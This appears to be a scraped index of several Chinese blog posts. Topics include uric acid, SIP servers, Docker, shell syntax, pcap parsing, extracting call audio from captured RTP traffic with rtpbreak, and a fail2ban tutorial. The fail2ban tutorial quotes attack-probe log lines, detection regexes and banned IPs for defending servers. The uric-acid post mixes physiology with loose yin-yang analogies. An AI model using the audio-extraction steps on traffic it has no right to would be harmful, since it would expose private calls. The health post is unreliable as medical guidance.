人体由细胞组成。人体的细胞中大约有40-60万亿个。细胞无时无刻不在新老更替、新陈代谢。\n微观世界的细胞变化,反映在人体身上,就是一个人从成长到衰老的过程。\n细胞中有一种重要的物质,核酸。核酸是脱氧核糖核酸(DNA)和核糖核酸(RNA)的总称。\n核酸由无数的核苷酸组成,核苷酸里有一种物质叫做嘌呤。而嘌呤和人体的尿酸有着密不可分的关系。\n除了作为遗传物质的一部分,嘌呤中的腺嘌呤也是腺苷三磷酸(ATP)的重要组成部分。ATP是人体直接的能量来源。\n在剧烈运动时,ATP会进一步分解成腺嘌呤。\n总之:尿酸和嘌呤的关系非常密切。人体细胞的遗传物质以及作为能量来源的ATP都会产生嘌呤。\n尿酸来源分类 内源性尿酸: 来自人体自身细胞衰亡,残留的嘌呤经过酶的作用产生尿酸 外源性尿酸: 大多来自食物中的嘌呤类化合物、核酸、核蛋白等物质、经过酶的作用下产生尿酸。 我们身体中的尿酸2/3来自自身的生命活动, 1/3来自食物。\n尿酸的合成与排泄 大部分的嘌呤在肝脏中经过氧化代谢、变成尿酸。在此过程中,有两类酶扮演着重要作用。 抑制尿酸合成的酶 促进尿酸合成的酶 2/3的尿酸通过肾脏排出。肾脏里也有能够促进或者抑制尿酸重吸收的酶。 1/3的尿酸通过肠道排出 所以尿酸较高的患者,医生会让你抽血查肝功能和肾功能,如果肝脏中的某些指标异常,也会通过B超去做进一步的判断。\n很多人误以为尿酸是查尿液,实际上这是被尿酸的名字误解了,尿酸是抽血检测的。\n人体中酶在生命活动中扮演着重要的角色。酶就好像是太极中的阴与阳一样,相互制衡达到平衡之时,身体才会健康。否则阴阳失衡,必然会存在身体病变。\n另外一些降低尿酸的药品,例如苯溴马隆片,其药理也是通过降低肾脏对尿酸的重吸收,来促进尿酸的排泄的。\n食物中的尿酸对人体影响有多大? 
具体哪些不能吃,哪些能吃,网上都有很多资料了。总之,大鱼大肉是要尽量避免的。食物主要要以清淡为主,吃饭不要吃撑,尽量做到7分饱,或者做到不饿为佳。\n高尿酸的危害 有溶解度相关知识的同学都会知道,溶质在溶液中都是有溶解度的,超过溶解度之后,物质就会析出。尿酸也是如此,过饱和的尿酸会析出称为尿酸结晶。\n这些结晶会沉积在关节和各种软组织,就可能造成这些部位的损害。\n当尿酸结晶附着在关节软骨表面上的滑膜上时,血液中的白细胞会把它当做敌人,释放各种酶去进攻。这些酶在进攻敌人的同时,也会造成自身关节软骨的溶解和自身软组织的损伤。 对痛风患者而言,感受到的就是苦不堪言的痛风性关节炎\n另外,大量的尿酸最终是通过肾脏排泄的,如果尿酸在肾脏上析出。对肾脏也会造成难以修复的损害,甚至患上尿毒症。光听这个尿毒症的名字,你就应该知道,这个病有多厉害。当你管不住自己嘴的时候,想想尿毒症吧。\n不要等到失去任劳任怨的肾脏之后,再后悔莫及。\n参考 https://baike.baidu.com/item/%E4%BA%BA%E4%BD%93%E7%BB%86%E8%83%9E ","title":"尿酸简史"},{"content":"之前我写过OpenSIPS的文章,所以在学习Kamailio时,会尝试和OpenSIPS做对比。\n从下图可以看出,Kamailio和Opensips算是同根同源了。很多语法、伪变量、模块使用方式,两者都极为相似。\n不一样的点 然而总体来说,kamailio相比OpenSIPS,更加灵活。 如果有机会,尝试下kamailio也未尝不可。而且kamailio的git star数量比OpenSIPS多很多,而且issue也比OpenSIPS少。\nKamailio 有wiki社区,注册之后,可以来编辑文档,相比于OpenSIPS只有官方文档,kamailio显得更容易让人亲近,提高了用户的参与度。 脚本上 kamailio支持三种不同的注释风格,opensips只支持一种 kamailio支持类似c语言的宏定义的方式写脚本,因而kamailio的脚本可以在不借助外部工具的情况下,写得非常灵活。可以参考 https://www.kamailio.org/wiki/cookbooks/5.5.x/core 的define部分 代码质量上 我觉得kamailio也是更胜一筹,至少kamailio还做了c的单元测试 总体而言,如果你要是第一次来选择,我更希望你用kamailio作为sip服务器。我之所以用OpenSIPS只不过是路径依赖而已。\n但是如果你学会了OpenSIPS, 那你学习kamailio就会非常轻松。\n参考 https://weekly-geekly.github.io/articles/150280/index.html https://github.com/kamailio/kamailio https://www.kamailio.org/wiki/ ","permalink":"https://wdd.js.org/opensips/tools/kamailio/","summary":"之前我写过OpenSIPS的文章,所以在学习Kamailio时,会尝试和OpenSIPS做对比。\n从下图可以看出,Kamailio和Opensips算是同根同源了。很多语法、伪变量、模块使用方式,两者都极为相似。\n不一样的点 然而总体来说,kamailio相比OpenSIPS,更加灵活。 如果有机会,尝试下kamailio也未尝不可。而且kamailio的git star数量比OpenSIPS多很多,而且issue也比OpenSIPS少。\nKamailio 有wiki社区,注册之后,可以来编辑文档,相比于OpenSIPS只有官方文档,kamailio显得更容易让人亲近,提高了用户的参与度。 脚本上 kamailio支持三种不同的注释风格,opensips只支持一种 kamailio支持类似c语言的宏定义的方式写脚本,因而kamailio的脚本可以在不借助外部工具的情况下,写得非常灵活。可以参考 https://www.kamailio.org/wiki/cookbooks/5.5.x/core 的define部分 代码质量上 我觉得kamailio也是更胜一筹,至少kamailio还做了c的单元测试 总体而言,如果你要是第一次来选择,我更希望你用kamailio作为sip服务器。我之所以用OpenSIPS只不过是路径依赖而已。\n但是如果你学会了OpenSIPS, 那你学习kamailio就会非常轻松。\n参考 
https://weekly-geekly.github.io/articles/150280/index.html https://github.com/kamailio/kamailio https://www.kamailio.org/wiki/ ","title":"另一个功能强大的sip server: kamailio"},{"content":"为了省去安装的麻烦,我直接使用的是容器版本的kaldi\nhttps://hub.docker.com/r/kaldiasr/kaldi\ndocker pull kaldiasr/kaldi This is the official Docker Hub of the Kaldi project: http://kaldi-asr.org Kaldi offers two sets of images: CPU-based images and GPU-based images. Daily builds of the latest version of the master branch (both CPU and GPU images) are pushed to DockerHub. Sample usage of the CPU based images: docker run -it kaldiasr/kaldi:latest Sample usage of the GPU based images: Note: use nvidia-docker to run the GPU images. docker run -it --runtime=nvidia kaldiasr/kaldi:gpu-latest Please refer to Kaldi\u0026#39;s GitHub repository for more details. kaldiasr/kaldi这个镜像是基于linuxkit构建的,如果缺少什么包,可以使用apt命令在容器中安装\n安装ohmyzsh 因为我比较喜欢用ohmyzsh, 所以即使在容器里,我也想安装这个工具\napt install zsh curl ","permalink":"https://wdd.js.org/posts/2020/05/haowe5/","summary":"为了省去安装的麻烦,我直接使用的是容器版本的kaldi\nhttps://hub.docker.com/r/kaldiasr/kaldi\ndocker pull kaldiasr/kaldi This is the official Docker Hub of the Kaldi project: http://kaldi-asr.org Kaldi offers two sets of images: CPU-based images and GPU-based images. Daily builds of the latest version of the master branch (both CPU and GPU images) are pushed to DockerHub. 
Sample usage of the CPU based images: docker run -it kaldiasr/kaldi:latest Sample usage of the GPU based images: Note: use nvidia-docker to run the GPU images.","title":"kaldi安装"},{"content":"let timer:NodeJS.Timer; timer = global.setTimeout(myFunction, 1000); 参考http://evanshortiss.com/development/nodejs/typescript/2016/11/16/timers-in-typescript.html\n","permalink":"https://wdd.js.org/posts/2020/05/uwe59t/","summary":"let timer:NodeJS.Timer; timer = global.setTimeout(myFunction, 1000); 参考http://evanshortiss.com/development/nodejs/typescript/2016/11/16/timers-in-typescript.html","title":"Type 'Timeout' is not assignable to type 'number'"},{"content":"sudo killall -HUP mDNSResponder ","permalink":"https://wdd.js.org/posts/2020/05/gy02f8/","summary":"sudo killall -HUP mDNSResponder ","title":"macbook 清空DNS缓存"},{"content":"if # if if condition; then commands; fi # if else if if condition; then commands; elif condition; then commands; else commands; fi 简单版本的 if 测试\n[ condition ] \u0026amp;\u0026amp; action; [ condition ] || action; 算数比较 [ $var -eq 0 ] #当var等于0 [ $var -ne 0 ] #当var不等于0 -gt 大于 -lt 小于 -ge 大于或等于 -le 小于或等于 使用-a, -o 可以组合复杂的测试。\n[ $var -ne 0 -a $var -gt 2 ] # -a相当于并且 [ $var -ne 0 -o $var -gt 2 ] # -o相当于或 文件比较 [ -f $file ] # 如果file是存在的文件路径或者文件名,则返回真 -f 测试文件路径或者文件是否存在 -x 测试文件是否可执行 -e 测试文件是否存在 -c 测试文件是否是字符设备 -b 测试文件是否是块设备 -w 测试文件是否可写 -r 测试文件是否可读 -L 测试文件是否是一个符号链接 字符串比较 字符串比较一定要用双中括号。\n[[ $str1 == $str2 ]] # 测试字符串是否相等 [[ $str1 != $str2 ]] # 测试字符串是否不相等 [[ $str1 \u0026gt; $str2 ]] # 测试str1字符序号比str2大 [[ $str1 \u0026lt; $str2 ]] # 测试str1字符序号比str2小 [[ -z $str ]] # 测试str是否是空字符串 [[ -n $str ]] # 测试str是否是非空字符串 if 和[之间必须包含有一个空格 # ok if [[ $1 == $2 ]]; then echo hello fi # error if[[ $1 == $2 ]]; then echo hello fi ","permalink":"https://wdd.js.org/shell/cond-test/","summary":"if # if if condition; then commands; fi # if else if if condition; then commands; elif condition; then commands; else commands; fi 简单版本的 if 测试\n[ condition ] \u0026amp;\u0026amp; action; [ condition ] || 
action; 算数比较 [ $var -eq 0 ] #当var等于0 [ $var -ne 0 ] #当var不等于0 -gt 大于 -lt 小于 -ge 大于或等于 -le 小于或等于 使用-a, -o 可以组合复杂的测试。\n[ $var -ne 0 -a $var -gt 2 ] # -a相当于并且 [ $var -ne 0 -o $var -gt 2 ] # -o相当于或 文件比较 [ -f $file ] # 如果file是存在的文件路径或者文件名,则返回真 -f 测试文件路径或者文件是否存在 -x 测试文件是否可执行 -e 测试文件是否存在 -c 测试文件是否是字符设备 -b 测试文件是否是块设备 -w 测试文件是否可写 -r 测试文件是否可读 -L 测试文件是否是一个符号链接 字符串比较 字符串比较一定要用双中括号。","title":"比较与测试"},{"content":"","permalink":"https://wdd.js.org/posts/2020/05/db6ou6/","summary":"","title":"xmpp学习"},{"content":" 介绍 之所以要写这篇文章,是因为我要从pcap格式的抓包文件中抽取出语音文件。之前虽然对tcp协议有不错的理解,但并没有写代码去真正的解包分析。\n最近用Node.js尝试去pcap文件中成功提取出了语音文件。再次做个总结。\n预备知识 字节序: 关于字节序,可以参考 https://www.ruanyifeng.com/blog/2016/11/byte-order.html。读取的时候,如果字节序设置错了,就会读出来一堆无法解析的内容 PCAP格式 下面是pcap文件的格式。\n开局是一个全局的头文件。后续跟着一系列的包头和包体。\nGlobal Header格式 全局头由六个字段组成,加起来一共24个字节。\ntypedef struct pcap_hdr_s { guint32 magic_number; /* magic number */ guint16 version_major; /* major version number */ guint16 version_minor; /* minor version number */ gint32 thiszone; /* GMT to local correction */ guint32 sigfigs; /* accuracy of timestamps */ guint32 snaplen; /* max length of captured packets, in octets */ guint32 network; /* data link type */ } pcap_hdr_t; magic_number 魔术字符,32位无符号整型,一般是0xa1b2c3d4或者0xd4c3b2a1,前者表示字段要按照大端字节序来读取,后者表示字段要按照小端字节序来读取。 version_major 大版本号,16位无符号整型。一般是2 version_minor 小版本号,16位无符号整型。一般是4 thiszone 时区 sigfigs 实际时间戳 snaplen 捕获的最大的长度 network 数据链路层的类型。参考http://www.tcpdump.org/linktypes.html, 常见的1就是表示IEEE 802.3 Packet Header 当读取了pcap文件的前24个字节之后,紧接着需要读取16个字节。这16个字节中,incl_len表示packet数据部分的长度。当拿到了Packet Data部分数据的长度,我们同时也就知道了下一个packet header要从哪个位置开始读取。\ntypedef struct pcaprec_hdr_s { guint32 ts_sec; /* timestamp seconds */ guint32 ts_usec; /* timestamp microseconds */ guint32 incl_len; /* number of octets of packet saved in file */ guint32 orig_len; /* actual length of packet */ } pcaprec_hdr_t; Packet Data packet data部分是链路层的数据,由global header的network类型去决定,一般可能是802.3的比较多。\nIEEE 802.3 当拿到packet 
data部分的数据之后。参考frame的格式。一般Preamble字段部分是没有的。所以我们可以把包的总长度减去14字节之后,拿到User Data部分的数据。\n其中Type/Length部分可以说明上层运载的是什么协议的包,比较常见的是0x0800表示上层是IPv4, 0x86dd表示上层是IPv6\n0 - 1500 length field (IEEE 802.3 and/or 802.2) 0x0800 IP(v4), Internet Protocol version 4 0x0806 ARP, Address Resolution Protocol 0x8137 IPX, Internet Packet eXchange (Novell) 0x86dd IPv6, Internet Protocol version 6 802.3的详情可以参考 https://wiki.wireshark.org/Ethernet?action=show\u0026amp;redirect=Protocols%2Feth\nIP包的封装格式 如何计算IP数据部分的长度呢?需要知道两个字段的值。\nTotal Length: IP数据报的总长度,单位是字节 IHL: IP数据报头部的总长度,单位是4字节。IHL比较常见的值是5,则说明IP数据头部的长度是20字节。IHL占4位,最大是15,所以IP头的最大长度是60字节(15 * 4) data部分的字节长度 = Total Length - IHL * 4\nTCP包的封装格式 UDP包的封装格式 UDP包的头部是定长的8个字节。数据部分的长度 = 总长度 - 8\nRTP包的封装格式 RTP包的数据部分长度 = 总长度 - 12\nPT部分表示编码格式,例如常见的PCMU是0,\nRTP详情 https://www.ietf.org/rfc/rfc3550.txt RTP数据体类型编码表参考 https://www.ietf.org/rfc/rfc3551.txt\n参考 http://www.tcpdump.org/linktypes.html https://wiki.wireshark.org/Development/LibpcapFileFormat ","permalink":"https://wdd.js.org/network/gzskun/","summary":"介绍 之所以要写这篇文章,是因为我要从pcap格式的抓包文件中抽取出语音文件。之前虽然对tcp协议有不错的理解,但并没有写代码去真正的解包分析。\n最近用Node.js尝试去pcap文件中成功提取出了语音文件。在此做个总结。\n预备知识 字节序: 关于字节序,可以参考 https://www.ruanyifeng.com/blog/2016/11/byte-order.html。读取的时候,如果字节序设置错了,就会读出来一堆无法解析的内容 PCAP格式 下面是pcap文件的格式。\n开局是一个全局的头文件。后续跟着一系列的包头和包体。\nGlobal Header格式 全局头由六个字段组成,加起来一共24个字节。\ntypedef struct pcap_hdr_s { guint32 magic_number; /* magic number */ guint16 version_major; /* major version number */ guint16 version_minor; /* minor version number */ gint32 thiszone; /* GMT to local correction */ guint32 sigfigs; /* accuracy of timestamps */ guint32 snaplen; /* max length of captured packets, in octets */ guint32 network; /* data link type */ } pcap_hdr_t; magic_number 魔术字符,32位无符号整型,一般是0xa1b2c3d4或者0xd4c3b2a1,前者表示字段要按照大端字节序来读取,后者表示字段要按照小端字节序来读取。 version_major 大版本号,16位无符号整型。一般是2 version_minor 小版本号,16位无符号整型。一般是4 thiszone 时区 sigfigs 时间戳的精度 snaplen 捕获的最大的长度 network 
数据链路层的类型。参考http://www.","title":"网络拆包笔记"},{"content":"wireshark具有这个功能,但是并不适合做批量执行。\n下面的方案比较适合批量执行。\n# 1. 安装依赖 yum install gcc libpcap-devel libnet-devel sox -y # 2. 克隆源码 git clone https://github.com/wangduanduan/rtpsplit.git # 3. 切换目录 cd rtpsplit # 4. 编译可执行文件 make # 5. 将可执行文件复制到/usr/local/bin目录下 cp src/rtpbreak /usr/local/bin # 6. 切换到录音文件的目录,假如当前目录只有一个文件 rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ audio git:(edge) ✗ rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ + rtpbreak v1.3a running here! + pid: 1885, date/time: 01/05/2020#09:49:05 + Configuration + INPUT Packet source: rxfile \u0026#39;krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap\u0026#39; Force datalink header length: disabled + OUTPUT Output directory: \u0026#39;./\u0026#39; RTP raw dumps: enabled RTP pcap dumps: enabled Fill gaps: enabled Dump noise: disabled Logfile: \u0026#39;.//rtp.0.txt\u0026#39; Logging to stdout: enabled Logging to syslog: disabled Be verbose: disabled + SELECT Sniff packets in promisc mode: enabled Add pcap filter: disabled Expecting even destination UDP port: disabled Expecting unprivileged source/destination UDP ports: disabled Expecting RTP payload type: any Expecting RTP payload length: any Packet timeout: 10.00 seconds Pattern timeout: 0.25 seconds Pattern packets: 5 + EXECUTION Running as user/group: root/root Running daemonized: disabled * You can dump stats sending me a SIGUSR2 signal * Reading packets... open di .//rtp.0.0.txt ! [rtp0] detected: pt=0(g711U) 192.168.40.192:26396 =\u0026gt; 192.168.60.229:20000 open di .//rtp.0.1.txt ! [rtp1] detected: pt=0(g711U) 10.197.169.10:49265 =\u0026gt; 192.168.60.229:20012 * eof reached. -- Caught SIGTERM signal (15), cleaning up... 
-- * [rtp1] closed: packets inbuffer=0 flushed=285 lost=0(0.00%), call_length=0m12s * [rtp0] closed: packets inbuffer=0 flushed=586 lost=0(0.00%), call_length=0m12s + Status Alive RTP Sessions: 0 Closed RTP Sessions: 2 Detected RTP Sessions: 2 Flushed RTP packets: 871 Lost RTP packets: 0 (0.00%) Noise (false positive) packets: 8 + No active RTP streams # 7. 查看输出文件 -rw-r--r--. 1 root root 185K May 1 09:22 krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -rw-r--r--. 1 root root 132K May 1 09:49 rtp.0.0.pcap -rw-r--r--. 1 root root 92K May 1 09:49 rtp.0.0.raw -rw-r--r--. 1 root root 412 May 1 09:49 rtp.0.0.txt -rw-r--r--. 1 root root 52K May 1 09:49 rtp.0.1.pcap -rw-r--r--. 1 root root 33K May 1 09:49 rtp.0.1.raw -rw-r--r--. 1 root root 435 May 1 09:49 rtp.0.1.txt -rw-r--r--. 1 root root 1.7K May 1 09:49 rtp.0.txt # 8. 使用sox 转码以及合成wav文件 sox -r8000 -c1 -t ul rtp.0.0.raw -t wav 0.wav sox -r8000 -c1 -t ul rtp.0.1.raw -t wav 1.wav sox -m 0.wav 1.wav call.wav # 最终合成的 call.wav文件,就是可以放到浏览器中播放的双声道语音文件 参考 rtpbreak帮助文档 Copyright (c) 2007-2008 Dallachiesa Michele \u0026lt;micheleDOTdallachiesaATposteDOTit\u0026gt; rtpbreak v1.3a is free software, covered by the GNU General Public License. USAGE: rtpbreak (-r|-i) \u0026lt;source\u0026gt; [options] INPUT -r \u0026lt;str\u0026gt; Read packets from pcap file \u0026lt;str\u0026gt; -i \u0026lt;str\u0026gt; Read packets from network interface \u0026lt;str\u0026gt; -L \u0026lt;int\u0026gt; Force datalink header length == \u0026lt;int\u0026gt; bytes OUTPUT -d \u0026lt;str\u0026gt; Set output directory to \u0026lt;str\u0026gt; (def:.) 
-w Disable RTP raw dumps -W Disable RTP pcap dumps -g Fill gaps in RTP raw dumps (caused by lost packets) -n Dump noise packets -f Disable stdout logging -F Enable syslog logging -v Be verbose SELECT -m Sniff packets in promisc mode -p \u0026lt;str\u0026gt; Add pcap filter \u0026lt;str\u0026gt; -e Expect even destination UDP port -u Expect unprivileged source/destination UDP ports (\u0026gt;1024) -y \u0026lt;int\u0026gt; Expect RTP payload type == \u0026lt;int\u0026gt; -l \u0026lt;int\u0026gt; Expect RTP payload length == \u0026lt;int\u0026gt; bytes -t \u0026lt;float\u0026gt; Set packet timeout to \u0026lt;float\u0026gt; seconds (def:10.00) -T \u0026lt;float\u0026gt; Set pattern timeout to \u0026lt;float\u0026gt; seconds (def:0.25) -P \u0026lt;int\u0026gt; Set pattern packets count to \u0026lt;int\u0026gt; (def:5) EXECUTION -Z \u0026lt;str\u0026gt; Run as user \u0026lt;str\u0026gt; -D Run in background (option -f implicit) MISC -k List known RTP payload types -h This ","permalink":"https://wdd.js.org/posts/2020/05/fosfbg/","summary":"wireshark具有这个功能,但是并不适合做批量执行。\n下面的方案比较适合批量执行。\n# 1. 安装依赖 yum install gcc libpcap-devel libnet-devel sox -y # 2. 克隆源码 git clone https://github.com/wangduanduan/rtpsplit.git # 3. 切换目录 cd rtpsplit # 4. 编译可执行文件 make # 5. 将可执行文件复制到/usr/local/bin目录下 cp src/rtpbreak /usr/local/bin # 6. 切换到录音文件的目录,假如当前目录只有一个文件 rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ audio git:(edge) ✗ rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ + rtpbreak v1.3a running here! 
+ pid: 1885, date/time: 01/05/2020#09:49:05 + Configuration + INPUT Packet source: rxfile \u0026#39;krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.","title":"从pcap文件提取转wav语音文件"},{"content":"娱乐至死,娱乐也能让人变得智障。\n贪图于精神愉悦,在永无休止的欢悦中难以自拔。\n道德经上写道:五色令人目盲,五音令人耳聋,五味令人口爽,驰骋田猎令人心发狂。\n现代人尤其如此。买分辨率最高的显示器,刷新频率最高的手机,买最贵的耳机,吃口味最为劲爆的火锅。\n感觉人都已经被五官所控制,变成了一个行尸走肉的躯壳。\n但是话又说回来,人为什么要这要麻痹自己呢?\n或许变成一个智障,才能稍微从现实的夹缝中稍微缓口气。\n冷风如刀,以大地为砧板,视众生皆为鱼肉。\n","permalink":"https://wdd.js.org/posts/2020/04/uffptn/","summary":"娱乐至死,娱乐也能让人变得智障。\n贪图于精神愉悦,在永无休止的欢悦中难以自拔。\n道德经上写道:五色令人目盲,五音令人耳聋,五味令人口爽,驰骋田猎令人心发狂。\n现代人尤其如此。买分辨率最高的显示器,刷新频率最高的手机,买最贵的耳机,吃口味最为劲爆的火锅。\n感觉人都已经被五官所控制,变成了一个行尸走肉的躯壳。\n但是话又说回来,人为什么要这要麻痹自己呢?\n或许变成一个智障,才能稍微从现实的夹缝中稍微缓口气。\n冷风如刀,以大地为砧板,视众生皆为鱼肉。","title":"娱乐智障"},{"content":"简介 如果你的主机在公网上有端口暴露出去,那么总会有一些不怀好意的家伙,会尝试通过各种方式攻击你的机器。常见的服务例如ssh, nginx都会有类似的威胁。\n手工将某个ip加入黑名单,这种操作太麻烦,而且效率低。而fail2ban就是一种自动化的解决方案。\nfail2ban工作原理 fail2ban的工作原理是监控某个日志文件,然后根据某些关键词,提取出攻击方的IP地址,然后将其加入到黑名单。\nfail2ban安装 yum install fail2ban -y # 如果找不到fail2ban包,就执行下面的命令 yum install epel-release # 安装fail2ban 完成后 systemctl enable fail2ban # 设置fail2ban开机启动 systemctl start fail2ban # 启动fail2ban systemctl status fail2ban # 查看fail2ban的运行状态 用fail2ban保护ssh fail2ban的配置文件位于/etc/fail2ban目录下。\n在该目录下建立一个文件 jail.local, 内容如下\nbantime 持续禁止多久 maxretry 最大多少次尝试 banaction 拦截后的操作 findtime 查找时间 看下下面的操作的意思是:监控sshd服务的最近10分钟的日志,如果某个ip在10分钟之内,有2次登录失败,就把这个ip加入黑名单, 24小时之后,这个ip才会被从黑名单中移除。\n[DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true 然后重启fail2ban, systemctl restart fail2ban fail2ban提供管理工具fail2ban-client\n**fail2ban-client status **显示fail2ban的状态 **fail2ban-client status sshd **显示某个监狱的配置。从下文的输出来看可以看出来fail2ban已经拦截了一些IP地址了 \u0026gt; fail2ban-client status Status |- Number of jail:\t1 `- Jail list:\tsshd \u0026gt; fail2ban-client status sshd Status for the jail: sshd |- Filter | |- Currently failed:\t2 | |- Total failed:\t23289 | `- Journal matches:\t_SYSTEMD_UNIT=sshd.service + _COMM=sshd `- Actions |- Currently 
banned:\t9 |- Total banned:\t1270 `- Banned IP list:\t93.174.93.10 165.22.238.92 23.231.25.234 134.255.219.207 77.202.192.113 120.224.47.86 144.91.70.139 90.3.194.84 217.182.89.87 fail2ban保护sshd的原理 fail2ban的配置文件目录下有个filter.d目录,该目录下有个sshd.conf的文件,这个文件就是对于sshd日志的过滤规则,里面有些正则是用来提取出恶意家伙的IP地址。\n该配置文件很长,我们只看其中一段, 其中\u0026lt;HOST\u0026gt;是个非常重要的关键词,是用来提取出远程的IP地址的。\ncmnfailre = ^[aA]uthentication (?:failure|error|failed) for \u0026lt;F-USER\u0026gt;.*\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;( via \\S+)?%(__suff)s$ ^User not known to the underlying authentication module for \u0026lt;F-USER\u0026gt;.*\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;%(__suff)s$ ^Failed publickey for invalid user \u0026lt;F-USER\u0026gt;(?P\u0026lt;cond_user\u0026gt;\\S+)|(?:(?! from ).)*?\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;%(__on_port_opt)s(?: ssh\\d*)?(?(cond_us 实战:如何自定义一个过滤规则 我的nginx服务器,几乎每隔2-3秒就会收到下面的一个请求。\n下面我就写个过滤规则,将类似请求的IP加入黑名单。\n165.22.225.238 - - [28/Apr/2020:08:19:38 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:22:48 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:24:08 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:25:45 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 
165.22.225.238 - - [28/Apr/2020:08:28:01 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; step1: 分析日志规则 165.22.225.238 - - [28/Apr/2020:08:19:38 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; HOST - - .*\u0026#34; 502 .* step2: 写规则文件 在filter.d目录下新建文件 banit.conf\n[INCLUDES] [Definition] failregex = \u0026lt;HOST\u0026gt; - - .*\u0026#34; 502 .* ignoreregex = step3: 修改jail.local [DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true [banit] enabled = true action = iptables-allports[name=banit, protocol=all] logpath = /var/log/nginx/access.log step4: 重启fail2ban fail2ban-client restart\nstep5: 查看效果 可以看出banit的这个监狱,已经加入了165.22.225.238这个ip,这个流氓不会再骚扰我们的主机了。\n\u0026gt; fail2ban fail2ban-client status banit Status for the jail: banit |- Filter | |- Currently failed:\t1 | |- Total failed:\t5 | `- File list:\t/var/log/nginx/access.log `- Actions |- Currently banned:\t1 |- Total banned:\t1 `- Banned IP list:\t165.22.225.238 \nfail2ban-client 常用操作 重启fail2ban: systemctl restart fail2ban 查看fail2ban opensips运行状态: fail2ban-client status opensips 黑名单操作 (注意,黑名单测试时,不要把自己的IP加到黑名单里做测试,否则就连不上机器了) IP加入黑名单:fail2ban-client set opensips banip 192.168.1.8 IP解锁:fail2ban-client set opensips unbanip 192.168.1.8 白名单操作 IP加入白名单:fail2ban-client set opensips addignoreip 192.168.1.8 IP从白名单中移除:fail2ban-client set opensips delignoreip 192.168.1.8 在所有监狱中加入IP白名单:fail2ban-client unban 192.168.1.8 fail2ban的拦截是基于jail, 如果一个ip在某个jail中,但是不在其他jail中,那么这个ip也是无法访问主机。如果想在所有jail中加入一个白名单,需要fail2ban-client unban ip。\nfail2ban-client帮助文档 Usage: fail2ban-client [OPTIONS] \u0026lt;COMMAND\u0026gt; Fail2Ban v0.10.5 
reads log file that contains password failure report and bans the corresponding IP addresses using firewall rules. Options: -c \u0026lt;DIR\u0026gt; configuration directory -s \u0026lt;FILE\u0026gt; socket path -p \u0026lt;FILE\u0026gt; pidfile path --loglevel \u0026lt;LEVEL\u0026gt; logging level --logtarget \u0026lt;TARGET\u0026gt; logging target, use file-name or stdout, stderr, syslog or sysout. --syslogsocket auto|\u0026lt;FILE\u0026gt; -d dump configuration. For debugging --dp, --dump-pretty dump the configuration using more human readable representation -t, --test test configuration (can be also specified with start parameters) -i interactive mode -v increase verbosity -q decrease verbosity -x force execution of the server (remove socket file) -b start server in background (default) -f start server in foreground --async start server in async mode (for internal usage only, don\u0026#39;t read configuration) --timeout timeout to wait for the server (for internal usage only, don\u0026#39;t read configuration) --str2sec \u0026lt;STRING\u0026gt; convert time abbreviation format to seconds -h, --help display this help message -V, --version print the version (-V returns machine-readable short format) Command: BASIC start starts the server and the jails restart restarts the server restart [--unban] [--if-exists] \u0026lt;JAIL\u0026gt; restarts the jail \u0026lt;JAIL\u0026gt; (alias for \u0026#39;reload --restart ... 
\u0026lt;JAIL\u0026gt;\u0026#39;) reload [--restart] [--unban] [--all] reloads the configuration without restarting of the server, the option \u0026#39;--restart\u0026#39; activates completely restarting of affected jails, thereby can unban IP addresses (if option \u0026#39;--unban\u0026#39; specified) reload [--restart] [--unban] [--if-exists] \u0026lt;JAIL\u0026gt; reloads the jail \u0026lt;JAIL\u0026gt;, or restarts it (if option \u0026#39;--restart\u0026#39; specified) stop stops all jails and terminate the server unban --all unbans all IP addresses (in all jails and database) unban \u0026lt;IP\u0026gt; ... \u0026lt;IP\u0026gt; unbans \u0026lt;IP\u0026gt; (in all jails and database) status gets the current status of the server ping tests if the server is alive echo for internal usage, returns back and outputs a given string help return this output version return the server version LOGGING set loglevel \u0026lt;LEVEL\u0026gt; sets logging level to \u0026lt;LEVEL\u0026gt;. Levels: CRITICAL, 